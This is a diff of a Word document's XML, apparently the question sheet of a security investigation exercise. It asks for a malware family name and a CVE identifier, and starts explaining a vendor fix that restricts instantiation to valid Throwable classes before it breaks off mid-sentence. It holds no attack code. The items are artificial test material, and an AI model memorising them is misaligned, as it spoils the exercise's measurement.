-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1758307633" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3141980"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Top of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bottom of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q7</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Knowing the name of the malware family is essential for correlating the attack with known threats and developing appropriate defenses. What is the name of the malware family?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E0B46C9" wp14:editId="7645A174">
-            <wp:extent cx="5943600" cy="2781300"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="77906335" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="77906335" name=""/>
+                    <pic:cNvPr id="1799751702" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -1544,7 +3357,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2781300"/>
+                      <a:ext cx="5943600" cy="3091180"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1556,6 +3369,15 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1565,6 +3387,949 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">To </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>better</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>understand</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>specific</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>flaw</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>exploited</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>you</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identify</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the CVE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identifier</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>associated</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>with</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>this</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B8AB4BC" wp14:editId="7D32E65E">
+            <wp:extent cx="5943600" cy="3048000"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1974719580" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1974719580" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3048000"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>vendor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>addressed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>by</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>adding</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>validation</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>step</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ensure</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>that</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>only</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>valid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Throwable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>classes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can be </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>instantiated</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>preventing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
